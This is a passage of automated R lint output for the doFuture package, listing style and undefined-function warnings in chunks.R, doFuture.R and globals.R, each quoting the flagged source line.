^~~~~~~~~~~~~~~~~\n```\n[R/chunks.R:25:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L25) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(nbrOfElements >= 0L, nbrOfWorkers >= 1L)\n  ^~~~~~~~~~~\n```\n[R/chunks.R:32:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L32) *style:* **Variable or function name should be snake_case.**\n```r\n​    nbrOfChunks <- max(1, ceiling(nbrOfElements / future.chunk.size))\n    ^~~~~~~~~~~\n```\n[R/chunks.R:35:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L35) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​      stop_if_not(length(future.scheduling) == 1L, !is.na(future.scheduling))\n      ^~~~~~~~~~~\n```\n[R/chunks.R:37:9:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L37) *style:* **Variable or function name should be snake_case.**\n```r\n​        nbrOfChunks <- nbrOfWorkers\n        ^~~~~~~~~~~\n```\n[R/chunks.R:38:42:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L38) *style:* **Variable or function name should be snake_case.**\n```r\n​        if (nbrOfChunks > nbrOfElements) nbrOfChunks <- nbrOfElements\n                                         ^~~~~~~~~~~\n```\n[R/chunks.R:40:9:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L40) *style:* **Variable or function name should be snake_case.**\n```r\n​        nbrOfChunks <- nbrOfElements\n        ^~~~~~~~~~~\n```\n[R/chunks.R:47:41:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L47) *style:* **Variable or function name should be snake_case.**\n```r\n​      if (nbrOfWorkers > nbrOfElements) nbrOfWorkers <- nbrOfElements\n                                        ^~~~~~~~~~~~\n```\n[R/chunks.R:48:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L48) *style:* **Variable or function name should be snake_case.**\n```r\n​      nbrOfChunks <- future.scheduling * nbrOfWorkers\n      ^~~~~~~~~~~\n```\n[R/chunks.R:50:9:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L50) *style:* **Variable or function name should be snake_case.**\n```r\n​        nbrOfChunks <- 1L\n        ^~~~~~~~~~~\n```\n[R/chunks.R:52:9:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L52) *style:* **Variable or function name should be snake_case.**\n```r\n​        nbrOfChunks <- nbrOfElements\n        ^~~~~~~~~~~\n```\n[R/chunks.R:57:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L57) *warning:* **no visible global function definition for ‘splitIndices’**\n```r\n​  splitIndices(nbrOfElements, ncl = nbrOfChunks)\n  ^~~~~~~~~~~~\n```\n[R/doFuture-package.R:22:27:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture-package.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' * `plan(multiprocess)`: \n                          ^\n```\n[R/doFuture-package.R:45:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture-package.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/doFuture-package.R:74:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture-package.R#L74) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' error on \\code{Error in \\{ : task 1 failed - \\\"could not find function \"my_stat\" ...}.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/doFuture.R:7:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L7) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(inherits(obj, \"foreach\"))\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:8:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L8) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(inherits(envir, \"environment\"))\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:9:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:11:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L11) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"doFuture() ...\")\n             ^~~~~~\n```\n[R/doFuture.R:17:9:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L17) *warning:* **no visible global function definition for ‘iter’, Did you mean 'it'?**\n```r\n​  it <- iter(obj)\n        ^~~~\n```\n[R/doFuture.R:19:18:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L19) *warning:* **no visible global function definition for ‘makeAccum’**\n```r\n​  accumulator <- makeAccum(it)\n                 ^~~~~~~~~\n```\n[R/doFuture.R:20:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L20) *style:* **Variable or function name should be snake_case.**\n```r\n​  globalsAs <- data$globalsAs\n  ^~~~~~~~~\n```\n[R/doFuture.R:21:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L21) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(!is.null(globalsAs), length(globalsAs) == 1L)\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:22:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:41:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L41) *warning:* **local variable ‘dummy_globals’ assigned but may not be used**\n```r\n​  dummy_globals <- NULL\n  ^~~~~~~~~~~~~\n```\n[R/doFuture.R:77:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L77) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- R expression:\")\n    ^~~~~~\n```\n[R/doFuture.R:78:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L78) *warning:* **no visible global function definition for ‘mprint’, Did you mean 'print'?**\n```r\n​    mprint(expr)\n    ^~~~~~\n```\n[R/doFuture.R:85:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L85) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- identifying globals and packages ...\")\n             ^~~~~~\n```\n[R/doFuture.R:86:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:98:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L98) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:103:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L103) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:105:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L105) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"  - R expression:\")\n    ^~~~~~\n```\n[R/doFuture.R:106:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L106) *warning:* **no visible global function definition for ‘mprint’, Did you mean 'print'?**\n```r\n​    mprint(expr)\n    ^~~~~~\n```\n[R/doFuture.R:109:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L109) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​    mstr(globals)\n    ^~~~\n```\n[R/doFuture.R:112:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:113:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L113) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- identifying globals and packages ... DONE\")\n    ^~~~~~\n```\n[R/doFuture.R:132:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L132) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​      stop_if_not(length(preschedule) == 1L, !is.na(preschedule))\n      ^~~~~~~~~~~\n```\n[R/doFuture.R:147:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L147) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"Number of chunks: %d\", length(chunks))\n             ^~~~~~\n```\n[R/doFuture.R:155:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L155) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"Number of futures (= number of chunks): %d\", nchunks)\n             ^~~~~~\n```\n[R/doFuture.R:157:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L157) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"Launching %d futures (chunks) ...\", nchunks)\n             ^~~~~~\n```\n[R/doFuture.R:160:16:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L160) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    if (debug) mdebug(\"Chunk #%d of %d ...\", ii, length(chunks))\n               ^~~~~~\n```\n[R/doFuture.R:174:16:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L174) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    if (debug) mdebug(\"Chunk #%d of %d ... DONE\", ii, nchunks)\n               ^~~~~~\n```\n[R/doFuture.R:177:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L177) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"Launching %d futures (chunks) ... DONE\", nchunks)\n             ^~~~~~\n```\n[R/doFuture.R:178:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L178) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(length(fs) == nchunks)\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:185:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L185) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- resolving future\")\n             ^~~~~~\n```\n[R/doFuture.R:186:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L186) *warning:* **no visible global function definition for ‘resolve’, Did you mean 'qr.solve'?**\n```r\n​  resolve(fs, value = TRUE)\n  ^~~~~~~\n```\n[R/doFuture.R:189:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L189) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- collecting values of future\")\n             ^~~~~~\n```\n[R/doFuture.R:190:31:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L190) *warning:* **no visible binding for global variable ‘value’**\n```r\n​  results <- lapply(fs, FUN = value, signal = FALSE)\n                              ^~~~~\n```\n[R/doFuture.R:192:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L192) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(length(results) == nchunks)\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:196:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/doFuture.R:203:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L203) *style:* **Lines should not be more than 80 characters.**\n```r\n​    msg <- sprintf(\"Unexpected error in doFuture(): After gathering and merging the results from %d chunks in to a list, the total number of elements (= %d) does not match the number of input elements in 'X' (= %d). There were in total %d chunks and %d elements (%s)\", nchunks, length(results2), length(args_list), nchunks, sum(chunk_sizes), chunk_summary)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/doFuture.R:205:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L205) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​      mdebug(msg)\n      ^~~~~~\n```\n[R/doFuture.R:206:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L206) *warning:* **no visible global function definition for ‘mprint’, Did you mean 'print'?**\n```r\n​      mprint(chunk_sizes)\n      ^~~~~~\n```\n[R/doFuture.R:207:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L207) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​      mdebug(\"Results before merge chunks:\")\n      ^~~~~~\n```\n[R/doFuture.R:208:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L208) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​      mstr(results)\n      ^~~~\n```\n[R/doFuture.R:209:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L209) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​      mdebug(\"Results after merge chunks:\")\n      ^~~~~~\n```\n[R/doFuture.R:210:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L210) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​      mstr(results2)\n      ^~~~\n```\n[R/doFuture.R:215:11:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L215) *warning:* **no visible global function definition for ‘FutureError’**\n```r\n​    ex <- FutureError(msg)\n          ^~~~~~~~~~~\n```\n[R/doFuture.R:220:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L220) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:223:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L223) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- accumulating results\")\n             ^~~~~~\n```\n[R/doFuture.R:233:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L233) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:241:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L241) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- processing errors (handler = %s)\", sQuote(error_handling))\n    ^~~~~~\n```\n[R/doFuture.R:243:18:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L243) *warning:* **no visible global function definition for ‘getErrorValue’**\n```r\n​  error_value <- getErrorValue(it)\n                 ^~~~~~~~~~~~~\n```\n[R/doFuture.R:245:20:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L245) *warning:* **no visible global function definition for ‘getErrorIndex’**\n```r\n​    error_index <- getErrorIndex(it)\n                   ^~~~~~~~~~~~~\n```\n[R/doFuture.R:256:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L256) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- extracting results\")\n             ^~~~~~\n```\n[R/doFuture.R:257:10:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L257) *warning:* **no visible global function definition for ‘getResult’**\n```r\n​  res <- getResult(it)\n         ^~~~~~~~~\n```\n[R/doFuture.R:258:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:259:14:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/doFuture.R#L259) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"doFuture() ... DONE\")\n             ^~~~~~\n```\n[R/globals.R:3:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L3) *style:* **Variable or function name should be snake_case.**\n```r\n​findGlobals_foreach <- function(expr, envir = parent.frame(), noexport = NULL) {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:5:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L5) *style:* **Variable or function name should be snake_case.**\n```r\n​  makeDotsEnv <- function(...) {\n  ^~~~~~~~~~~\n```\n[R/globals.R:19:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L19) *warning:* **no visible global function definition for ‘getexports’**\n```r\n​  getexports(expr, e = exportenv, env = envir, bad = noexport)\n  ^~~~~~~~~~\n```\n[R/globals.R:26:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/globals.R:31:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L31) *style:* **Variable or function name should be snake_case.**\n```r\n​globalsAs <- function(globalsAs = \"*\") {\n^~~~~~~~~\n```\n[R/globals.R:31:23:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L31) *style:* **Variable or function name should be snake_case.**\n```r\n​globalsAs <- function(globalsAs = \"*\") {\n                      ^~~~~~~~~\n```\n[R/globals.R:32:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L32) *style:* **Lines should not be more than 80 characters.**\n```r\n​  stop_if_not(is.character(globalsAs), !anyNA(globalsAs), length(globalsAs) == 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:32:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L32) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.character(globalsAs), !anyNA(globalsAs), length(globalsAs) == 1)\n  ^~~~~~~~~~~\n```\n[R/globals.R:38:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L38) *style:* **Lines should not be more than 80 characters.**\n```r\n​      .Defunct(msg = \"Option 'doFuture.globals.nullexport' is deprecated. Use 'doFuture.globalsAs = \\\"future-unless-manual\\\" or \\\"manual\\\" instead.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:41:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L41) *style:* **Variable or function name should be snake_case.**\n```r\n​    globalsAs <- getOption(\"doFuture.globalsAs\")\n    ^~~~~~~~~\n```\n[R/globals.R:42:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/globals.R:47:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L47) *style:* **Lines should not be more than 80 characters.**\n```r\n​        .Defunct(msg = sprintf(\"Option doFuture.foreach.export = %s is no longer supported. The closest is doFuture.globalsAs = 'future'.\", dQuote(t)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:49:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/globals.R:51:9:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L51) *style:* **Variable or function name should be snake_case.**\n```r\n​        globalsAs <- \"future\"\n        ^~~~~~~~~\n```\n[R/globals.R:53:9:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L53) *style:* **Variable or function name should be snake_case.**\n```r\n​        globalsAs <- \"future-with-warning\"\n        ^~~~~~~~~\n```\n[R/globals.R:55:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L55) *style:* **Lines should not be more than 80 characters.**\n```r\n​        .Defunct(msg = sprintf(\"Option 'doFuture.foreach.export' is defunct and replaced by option 'doFuture.globalsAs'. Also, value '%s' is unknown.\", dQuote(t)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:58:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L58) *style:* **Lines should not be more than 80 characters.**\n```r\n​      .Deprecated(msg = sprintf(\"Option doFuture.foreach.export = %s is deprecated and has been replaced by doFuture.globalsAs = %s\", dQuote(t), sQuote(globalsAs)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:64:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L64) *style:* **Variable or function name should be snake_case.**\n```r\n​    globalsAs <- Sys.getenv(\"R_DOFUTURE_GLOBALSAS\", \"future-unless-manual\")\n    ^~~~~~~~~\n```\n[R/globals.R:66:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L66) *style:* **Variable or function name should be snake_case.**\n```r\n​    globalsAs <- getOption(\"doFuture.globalsAs.fallback\", globalsAs)\n    ^~~~~~~~~\n```\n[R/globals.R:69:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L69) *style:* **Lines should not be more than 80 characters.**\n```r\n​  stop_if_not(is.character(globalsAs), !anyNA(globalsAs), length(globalsAs) == 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:69:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L69) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.character(globalsAs), !anyNA(globalsAs), length(globalsAs) == 1)\n  ^~~~~~~~~~~\n```\n[R/globals.R:75:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L75) *style:* **Variable or function name should be snake_case.**\n```r\n​getGlobalsAndPackages_fix <- local({\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:94:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L94) *style:* **Lines should not be more than 80 characters.**\n```r\n​getGlobalsAndPackages_doFuture <- function(expr, envir, export = NULL, noexport = NULL, packages = NULL, globalsAs, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:94:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L94) *style:* **Variable or function name should be snake_case.**\n```r\n​getGlobalsAndPackages_doFuture <- function(expr, envir, export = NULL, noexport = NULL, packages = NULL, globalsAs, debug = FALSE) 